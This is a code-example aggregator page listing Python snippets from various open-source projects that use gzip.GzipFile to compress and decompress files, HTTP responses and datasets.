python类GzipFile()的实例源码

special.py 文件源码 项目:sublime-text-3-packages 作者: nickjj 项目源码 文件源码 阅读 23 收藏 0 点赞 0 评论 0
def get_tokens(self, text):
        if isinstance(text, text_type):
            # raw token stream never has any non-ASCII characters
            text = text.encode('ascii')
        if self.compress == 'gz':
            import gzip
            gzipfile = gzip.GzipFile('', 'rb', 9, BytesIO(text))
            text = gzipfile.read()
        elif self.compress == 'bz2':
            import bz2
            text = bz2.decompress(text)

        # do not call Lexer.get_tokens() because we do not want Unicode
        # decoding to occur, and stripping is not optional.
        text = text.strip(b'\n') + b'\n'
        for i, t, v in self.get_tokens_unprocessed(text):
            yield t, v
NNTPCryptography.py 文件源码 项目:newsreap 作者: caronc 项目源码 文件源码 阅读 26 收藏 0 点赞 0 评论 0
def encode_public_key(self):
        """
        Based on spotnab, this is the gzipped version of the key
        with base64 applied to it. We encode it as such and
        return it.

        """
        fileobj = StringIO()
        with GzipFile(fileobj=fileobj, mode="wb") as f:
            try:
                f.write(self.public_pem())
            except TypeError:
                # It wasn't initialized yet
                return None

        return b64encode(fileobj.getvalue())
steamgifts.py 文件源码 项目:AutoSteamGifts 作者: joaopsys 项目源码 文件源码 阅读 26 收藏 0 点赞 0 评论 0
def getWebPage(url, headers, cookies, postData=None):
    try:
        if (postData):
            params = urllib.parse.urlencode(postData)
            params = params.encode('utf-8')
            request = urllib.request.Request(url, data=params, headers=headers)
        else:
            print('Fetching '+url)
            request = urllib.request.Request(url, None, headers)
        request.add_header('Cookie', cookies)
        if (postData):
            response = urllib.request.build_opener(urllib.request.HTTPCookieProcessor).open(request)
        else:
            response = urllib.request.urlopen(request)
        if response.info().get('Content-Encoding') == 'gzip':
            buf = BytesIO(response.read())
            f = gzip.GzipFile(fileobj=buf)
            r = f.read()
        else:
            r = response.read()

        return r
    except Exception as e:
        print("Error processing webpage: "+str(e))
        return None

## https://stackoverflow.com/questions/480214/how-do-you-remove-duplicates-from-a-list-in-python-whilst-preserving-order
tarfile.py 文件源码 项目:kinect-2-libras 作者: inessadl 项目源码 文件源码 阅读 21 收藏 0 点赞 0 评论 0
def gzopen(cls, name, mode="r", fileobj=None, compresslevel=9, **kwargs):
        """Open gzip compressed tar archive name for reading or writing.
           Appending is not allowed.
        """
        if len(mode) > 1 or mode not in "rw":
            raise ValueError("mode must be 'r' or 'w'")

        try:
            import gzip
            gzip.GzipFile
        except (ImportError, AttributeError):
            raise CompressionError("gzip module is not available")

        try:
            t = cls.taropen(name, mode,
                gzip.GzipFile(name, mode + "b", compresslevel, fileobj),
                **kwargs)
        except IOError:
            raise ReadError("not a gzip file")
        t._extfileobj = False
        return t
xmlrpclib.py 文件源码 项目:kinect-2-libras 作者: inessadl 项目源码 文件源码 阅读 29 收藏 0 点赞 0 评论 0
def gzip_encode(data):
    """data -> gzip encoded data

    Encode data using the gzip content encoding as described in RFC 1952
    """
    if not gzip:
        raise NotImplementedError
    f = StringIO.StringIO()
    gzf = gzip.GzipFile(mode="wb", fileobj=f, compresslevel=1)
    gzf.write(data)
    gzf.close()
    encoded = f.getvalue()
    f.close()
    return encoded

##
# Decode a string using the gzip content encoding such as specified by the
# Content-Encoding: gzip
# in the HTTP header, as described in RFC 1952
#
# @param data The encoded data
# @return the unencoded data
# @raises ValueError if data is not correctly coded.
xmlrpclib.py 文件源码 项目:kinect-2-libras 作者: inessadl 项目源码 文件源码 阅读 31 收藏 0 点赞 0 评论 0
def gzip_decode(data):
    """gzip encoded data -> unencoded data

    Decode data using the gzip content encoding as described in RFC 1952
    """
    if not gzip:
        raise NotImplementedError
    f = StringIO.StringIO(data)
    gzf = gzip.GzipFile(mode="rb", fileobj=f)
    try:
        decoded = gzf.read()
    except IOError:
        raise ValueError("invalid data")
    f.close()
    gzf.close()
    return decoded

##
# Return a decoded file-like object for the gzip encoding
# as described in RFC 1952.
#
# @param response A stream supporting a read() method
# @return a file-like object that the decoded data can be read() from
client.py 文件源码 项目:plugin.video.exodus 作者: lastship 项目源码 文件源码 阅读 22 收藏 0 点赞 0 评论 0
def _get_result(response, limit=None):
    if limit == '0':
        result = response.read(224 * 1024)
    elif limit:
        result = response.read(int(limit) * 1024)
    else:
        result = response.read(5242880)

    try:
        encoding = response.info().getheader('Content-Encoding')
    except:
        encoding = None
    if encoding == 'gzip':
        result = gzip.GzipFile(fileobj=StringIO.StringIO(result)).read()

    return result
convert.py 文件源码 项目:jx-sqlite 作者: mozilla 项目源码 文件源码 阅读 32 收藏 0 点赞 0 评论 0
def bytes2zip(bytes):
    """
    RETURN COMPRESSED BYTES
    """
    if hasattr(bytes, "read"):
        buff = TemporaryFile()
        archive = gzip.GzipFile(fileobj=buff, mode='w')
        for b in bytes:
            archive.write(b)
        archive.close()
        buff.seek(0)
        from pyLibrary.env.big_data import FileString, safe_size
        return FileString(buff)

    buff = BytesIO()
    archive = gzip.GzipFile(fileobj=buff, mode='w')
    archive.write(bytes)
    archive.close()
    return buff.getvalue()
__init__.py 文件源码 项目:oscars2016 作者: 0x0ece 项目源码 文件源码 阅读 22 收藏 0 点赞 0 评论 0
def _decompressContent(response, new_content):
    content = new_content
    try:
        encoding = response.get('content-encoding', None)
        if encoding in ['gzip', 'deflate']:
            if encoding == 'gzip':
                content = gzip.GzipFile(fileobj=StringIO.StringIO(new_content)).read()
            if encoding == 'deflate':
                content = zlib.decompress(content)
            response['content-length'] = str(len(content))
            # Record the historical presence of the encoding in a way the won't interfere.
            response['-content-encoding'] = response['content-encoding']
            del response['content-encoding']
    except IOError:
        content = ""
        raise FailedToDecompressContent(_("Content purported to be compressed with %s but failed to decompress.") % response.get('content-encoding'), response, content)
    return content
mnist.py 文件源码 项目:photinia 作者: XoriieInpottn 项目源码 文件源码 阅读 31 收藏 0 点赞 0 评论 0
def _extract_images(filename):
        """???????????????????

        :param filename: ?????
        :return: 4??numpy??[index, y, x, depth]? ???np.float32
        """
        images = []
        print('Extracting {}'.format(filename))
        with gzip.GzipFile(fileobj=open(filename, 'rb')) as f:
            buf = f.read()
            index = 0
            magic, num_images, rows, cols = struct.unpack_from('>IIII', buf, index)
            if magic != 2051:
                raise ValueError('Invalid magic number {} in MNIST image file: {}'.format(magic, filename))
            index += struct.calcsize('>IIII')
            for i in range(num_images):
                img = struct.unpack_from('>784B', buf, index)
                index += struct.calcsize('>784B')
                img = np.array(img, dtype=np.float32)
                # ????[0,255]???[0,1]
                img = np.multiply(img, 1.0 / 255.0)
                img = img.reshape(rows, cols, 1)
                images.append(img)
        return np.array(images, dtype=np.float32)
mnist.py 文件源码 项目:photinia 作者: XoriieInpottn 项目源码 文件源码 阅读 26 收藏 0 点赞 0 评论 0
def _extract_labels(filename, num_classes=10):
        """???????????????

        :param filename: ?????
        :param num_classes: ??one-hot??????????10?
        :return: 2??numpy??[index, num_classes]? ???np.float32
        """
        labels = []
        print('Extracting {}'.format(filename))
        with gzip.GzipFile(fileobj=open(filename, 'rb')) as f:
            buf = f.read()
            index = 0
            magic, num_labels = struct.unpack_from('>II', buf, index)
            if magic != 2049:
                raise ValueError('Invalid magic number {} in MNIST label file: {}'.format(magic, filename))
            index += struct.calcsize('>II')
            for i in range(num_labels):
                label = struct.unpack_from('>B', buf, index)
                index += struct.calcsize('>B')
                label_one_hot = np.zeros(num_classes, dtype=np.float32)
                label_one_hot[label[0]] = 1
                labels.append(label_one_hot)
        return np.array(labels, dtype=np.float32)
__init__.py 文件源码 项目:sndlatr 作者: Schibum 项目源码 文件源码 阅读 22 收藏 0 点赞 0 评论 0
def _decompressContent(response, new_content):
    content = new_content
    try:
        encoding = response.get('content-encoding', None)
        if encoding in ['gzip', 'deflate']:
            if encoding == 'gzip':
                content = gzip.GzipFile(fileobj=StringIO.StringIO(new_content)).read()
            if encoding == 'deflate':
                content = zlib.decompress(content)
            response['content-length'] = str(len(content))
            # Record the historical presence of the encoding in a way the won't interfere.
            response['-content-encoding'] = response['content-encoding']
            del response['content-encoding']
    except IOError:
        content = ""
        raise FailedToDecompressContent(_("Content purported to be compressed with %s but failed to decompress.") % response.get('content-encoding'), response, content)
    return content
sideshow.py 文件源码 项目:pyrsss 作者: butala 项目源码 文件源码 阅读 20 收藏 0 点赞 0 评论 0
def update_sideshow_file(fname,
                         server_fname,
                         server=SIDESHOW_SERVER,
                         temp_path=gettempdir()):
    """
    Update the JPL side show file stored locally at *fname*. The
    remote file is accessed via FTP on *server* at *server_fname*. The
    path *temp_path* is used to store intermediate files. Return
    *fname*.
    """
    dest_fname = replace_path(temp_path, server_fname)
    logger.info('opening connection to {}'.format(server))
    with closing(FTP(server)) as ftp, open(dest_fname, 'w') as fid:
        logger.info('logging in')
        ftp.login()
        logger.info('writing to {}'.format(dest_fname))
        ftp.retrbinary('RETR ' + server_fname, fid.write)
    logger.info('uncompressing file to {}'.format(fname))
    with GzipFile(dest_fname) as gzip_fid, open(fname, 'w') as fid:
        fid.write(gzip_fid.read())
    return fname
usb_pdml.py 文件源码 项目:gps_track_pod 作者: iwanders 项目源码 文件源码 阅读 23 收藏 0 点赞 0 评论 0
def parse_file(self):
        if self.path.endswith("gz"):
            f = gzip.GzipFile(self.path)
        else:
            f = open(self.path)
        tree = ET.parse(f)
        f.close()
        root = tree.getroot()
        current_urbs = {}
        for child in root:
            p = USBPacket(child)
            urb_id = p["usb.urb_id"]
            urb_status = p["usb.urb_status"]
            urb_type = p["usb.urb_type"]
            if (urb_type == URB_TYPE_SUBMIT):
                current_urbs[urb_id] = p
            if (urb_type == URB_TYPE_COMPLETED):
                if (urb_id not in current_urbs):
                    print("Urb id not present: {:x}".format(urb_id))
                else:
                    submit = current_urbs[urb_id]
                    completed = p
                    self.usb_transaction(submit, completed)
                    del current_urbs[urb_id]
test_client.py 文件源码 项目:Tinychat-Bot--Discontinued 作者: Tinychat 项目源码 文件源码 阅读 24 收藏 0 点赞 0 评论 0
def setUp(self):
        import gzip

        env = remoting.Envelope(pyamf.AMF3)
        r = remoting.Response(['foo' * 50000] * 200)

        env['/1'] = r

        response = remoting.encode(env).getvalue()

        buf = util.BufferedByteStream()
        x = gzip.GzipFile(fileobj=buf, mode='wb')

        x.write(response)

        x.close()

        self.canned_response = buf.getvalue()

        BaseServiceTestCase.setUp(self)

        self.headers['Content-Encoding'] = 'gzip'
archivebot.py 文件源码 项目:abusehelper 作者: Exploit-install 项目源码 文件源码 阅读 26 收藏 0 点赞 0 评论 0
def _compress(path):
    with open(path, "rb") as archive:
        directory, filename = _split_compress_path(path)
        prefix, suffix = os.path.splitext(filename)

        with _unique_writable_file(directory, prefix, suffix + ".gz") as (gz_path, gz_file):
            compressed = gzip.GzipFile(fileobj=gz_file)
            try:
                compressed.writelines(archive)
            finally:
                compressed.close()

    try:
        os.remove(path)
    except OSError:
        pass

    return gz_path
text.py 文件源码 项目:CodingDojo 作者: ComputerSocietyUNB 项目源码 文件源码 阅读 25 收藏 0 点赞 0 评论 0
def compress_sequence(sequence):
    buf = StreamingBuffer()
    zfile = GzipFile(mode='wb', compresslevel=6, fileobj=buf)
    # Output headers...
    yield buf.read()
    for item in sequence:
        zfile.write(item)
        data = buf.read()
        if data:
            yield data
    zfile.close()
    yield buf.read()


# Expression to match some_token and some_token="with spaces" (and similarly
# for single-quoted strings).
Logger.py 文件源码 项目:mongodb_consistent_backup 作者: Percona-Lab 项目源码 文件源码 阅读 30 收藏 0 点赞 0 评论 0
def compress(self, current=False):
        gz_log = None
        try:
            compress_file = self.backup_log_file
            if not current:
                compress_file = self.last_log
                if not os.path.isfile(self.last_log) or self.last_log == self.backup_log_file:
                    return
            logging.info("Compressing log file: %s" % compress_file)
            gz_file = "%s.gz" % compress_file
            gz_log  = GzipFile(gz_file, "w+")
            with open(compress_file) as f:
                for line in f:
                    gz_log.write(line)
            os.remove(compress_file)
        finally:
            if gz_log:
                gz_log.close()
common.py 文件源码 项目:malware 作者: JustF0rWork 项目源码 文件源码 阅读 20 收藏 0 点赞 0 评论 0
def retrieve_content(url, data=None):
    """
    Retrieves page content from given URL
    """

    try:
        req = urllib2.Request("".join(url[i].replace(' ', "%20") if i > url.find('?') else url[i] for i in xrange(len(url))), data, {"User-agent": NAME, "Accept-encoding": "gzip, deflate"})
        resp = urllib2.urlopen(req, timeout=TIMEOUT)
        retval = resp.read()
        encoding = resp.headers.get("Content-Encoding")

        if encoding:
            if encoding.lower() == "deflate":
                data = StringIO.StringIO(zlib.decompress(retval, -15))
            else:
                data = gzip.GzipFile("", "rb", 9, StringIO.StringIO(retval))
            retval = data.read()
    except Exception, ex:
        retval = ex.read() if hasattr(ex, "read") else getattr(ex, "msg", str())

    return retval or ""
ServerConnection.py 文件源码 项目:hostapd-mana 作者: adde88 项目源码 文件源码 阅读 20 收藏 0 点赞 0 评论 0
def handleResponse(self, data):
        if (self.isCompressed):
            logging.debug("Decompressing content...")
            data = gzip.GzipFile('', 'rb', 9, StringIO.StringIO(data)).read()

        logging.log(self.getLogLevel(), "Read from server:\n" + data)
        #logging.log(self.getLogLevel(), "Read from server:\n <large data>" )


        data = self.replaceSecureLinks(data)

        if (self.contentLength != None):
            self.client.setHeader('Content-Length', len(data))

        self.client.write(data)
        self.shutdown()
ServerConnection.py 文件源码 项目:hostapd-mana 作者: adde88 项目源码 文件源码 阅读 23 收藏 0 点赞 0 评论 0
def handleResponse(self, data):
        if (self.isCompressed):
            logging.debug("Decompressing content...")
            data = gzip.GzipFile('', 'rb', 9, StringIO.StringIO(data)).read()

        #logging.log(self.getLogLevel(), "Read from server:\n" + data)
        logging.log(self.getLogLevel(), "Read from server:\n <large data>" )


        data = self.replaceSecureLinks(data)

        if (self.contentLength != None):
            self.client.setHeader('Content-Length', len(data))

        self.client.write(data)
        self.shutdown()
ServerConnection.py 文件源码 项目:hostapd-mana 作者: adde88 项目源码 文件源码 阅读 23 收藏 0 点赞 0 评论 0
def handleResponse(self, data):
        if (self.isCompressed):
            logging.debug("Decompressing content...")
            data = gzip.GzipFile('', 'rb', 9, StringIO.StringIO(data)).read()

        logging.log(self.getLogLevel(), "Read from server:\n" + data)
        #logging.log(self.getLogLevel(), "Read from server:\n <large data>" )


        data = self.replaceSecureLinks(data)

        if (self.contentLength != None):
            self.client.setHeader('Content-Length', len(data))

        self.client.write(data)
        self.shutdown()
test_process.py 文件源码 项目:hostapd-mana 作者: adde88 项目源码 文件源码 阅读 26 收藏 0 点赞 0 评论 0
def testProcess(self):
        if os.path.exists('/bin/gzip'): cmd = '/bin/gzip'
        elif os.path.exists('/usr/bin/gzip'): cmd = '/usr/bin/gzip'
        else: raise RuntimeError("gzip not found in /bin or /usr/bin")
        s = "there's no place like home!\n" * 3
        p = Accumulator()
        d = p.endedDeferred = defer.Deferred()
        reactor.spawnProcess(p, cmd, [cmd, "-c"], env=None, path="/tmp",
                             usePTY=self.usePTY)
        p.transport.write(s)
        p.transport.closeStdin()

        def processEnded(ign):
            f = p.outF
            f.seek(0, 0)
            gf = gzip.GzipFile(fileobj=f)
            self.assertEquals(gf.read(), s)
        return d.addCallback(processEnded)
ServerConnection.py 文件源码 项目:hostapd-mana 作者: adde88 项目源码 文件源码 阅读 24 收藏 0 点赞 0 评论 0
def handleResponse(self, data):
        if (self.isCompressed):
            logging.debug("Decompressing content...")
            data = gzip.GzipFile('', 'rb', 9, StringIO.StringIO(data)).read()

        logging.log(self.getLogLevel(), "Read from server:\n" + data)
        #logging.log(self.getLogLevel(), "Read from server:\n <large data>" )


        data = self.replaceSecureLinks(data)

        if (self.contentLength != None):
            self.client.setHeader('Content-Length', len(data))

        self.client.write(data)
        self.shutdown()
checkpoint.py 文件源码 项目:instagram_private_api 作者: ping 项目源码 文件源码 阅读 44 收藏 0 点赞 0 评论 0
def respond_to_checkpoint(self, response_code):
        headers = {
            'User-Agent': self.USER_AGENT,
            'Origin': 'https://i.instagram.com',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
            'Accept-Language': 'en-US',
            'Accept-Encoding': 'gzip',
            'Referer': self.endpoint,
            'Cookie': self.cookie,
        }

        req = Request(self.endpoint, headers=headers)
        data = {'csrfmiddlewaretoken': self.csrftoken, 'response_code': response_code}
        res = urlopen(req, data=urlencode(data).encode('ascii'), timeout=self.timeout)

        if res.info().get('Content-Encoding') == 'gzip':
            buf = BytesIO(res.read())
            content = gzip.GzipFile(fileobj=buf).read().decode('utf-8')
        else:
            content = res.read().decode('utf-8')

        return res.code, content
dataload.py 文件源码 项目:mygene.info 作者: biothings 项目源码 文件源码 阅读 21 收藏 0 点赞 0 评论 0
def anyfile(infile, mode='r', encoding="utf8"):
    '''
    return a file handler with the support for gzip/zip comppressed files
    if infile is a two value tuple, then first one is the compressed file;
      the second one is the actual filename in the compressed file.
      e.g., ('a.zip', 'aa.txt')

    '''
    if isinstance(infile, tuple):
        infile, rawfile = infile[:2]
    else:
        rawfile = os.path.splitext(infile)[0]
    filetype = os.path.splitext(infile)[1].lower()
    if filetype == '.gz':
        import gzip
        in_f = io.TextIOWrapper(gzip.GzipFile(infile, 'r'),encoding=encoding)
    elif filetype == '.zip':
        import zipfile
        in_f = io.TextIOWrapper(zipfile.ZipFile(infile, 'r').open(rawfile, 'r'),encoding=encoding)
    else:
        in_f = open(infile, mode, encoding=encoding)
    return in_f
__init__.py 文件源码 项目:GAMADV-XTD 作者: taers232c 项目源码 文件源码 阅读 21 收藏 0 点赞 0 评论 0
def _decompressContent(response, new_content):
    content = new_content
    try:
        encoding = response.get('content-encoding', None)
        if encoding in ['gzip', 'deflate']:
            if encoding == 'gzip':
                content = gzip.GzipFile(fileobj=StringIO.StringIO(new_content)).read()
            if encoding == 'deflate':
                content = zlib.decompress(content)
            response['content-length'] = str(len(content))
            # Record the historical presence of the encoding in a way the won't interfere.
            response['-content-encoding'] = response['content-encoding']
            del response['content-encoding']
    except IOError:
        content = ""
        raise FailedToDecompressContent(_("Content purported to be compressed with %s but failed to decompress.") % response.get('content-encoding'), response, content)
    return content
httpall.py 文件源码 项目:packet_analysis 作者: tanjiti 项目源码 文件源码 阅读 21 收藏 0 点赞 0 评论 0
def __parse_server_data(self):
        """

        :return:
        """
        if self.data_s2c:
            try:
                resp = dpkt.http.Response(self.data_s2c)
                if resp.headers.get("content-encoding") == "gzip":
                    data = resp.body
                    data_arrays = mills.str2hex(data)
                    if data_arrays[0:3] == ["1f", "8b", "08"]:
                        data_unzip = gzip.GzipFile(fileobj=StringIO(data)).read()

                        resp.body = data_unzip

                return resp
            except Exception as e:
                logging.error("[dpkt_http_resp_parse_failed]: %s %r" % (self.data_s2c, e))
sitemap_gen.py 文件源码 项目:pymotw3 作者: reingart 项目源码 文件源码 阅读 20 收藏 0 点赞 0 评论 0
def OpenFileForRead(path, logtext):
  """ Opens a text file, be it GZip or plain """

  frame = None
  file  = None

  if not path:
    return (frame, file)

  try:
    if path.endswith('.gz'):
      frame = open(path, 'rb')
      file = gzip.GzipFile(fileobj=frame, mode='rt')
    else:
      file = open(path, 'rt')

    if logtext:
      output.Log('Opened %s file: %s' % (logtext, path), 1)
    else:
      output.Log('Opened file: %s' % path, 1)
  except IOError:
    output.Error('Can not open file: %s' % path)

  return (frame, file)
#end def OpenFileForRead
__init__.py 文件源码 项目:httplib2 作者: httplib2 项目源码 文件源码 阅读 19 收藏 0 点赞 0 评论 0
def _decompressContent(response, new_content):
    content = new_content
    try:
        encoding = response.get('content-encoding', None)
        if encoding in ['gzip', 'deflate']:
            if encoding == 'gzip':
                content = gzip.GzipFile(fileobj=StringIO.StringIO(new_content)).read()
            if encoding == 'deflate':
                content = zlib.decompress(content, -zlib.MAX_WBITS)
            response['content-length'] = str(len(content))
            # Record the historical presence of the encoding in a way the won't interfere.
            response['-content-encoding'] = response['content-encoding']
            del response['content-encoding']
    except IOError:
        content = ""
        raise FailedToDecompressContent(_("Content purported to be compressed with %s but failed to decompress.") % response.get('content-encoding'), response, content)
    return content


问题


面经


文章

微信
公众号

扫码关注公众号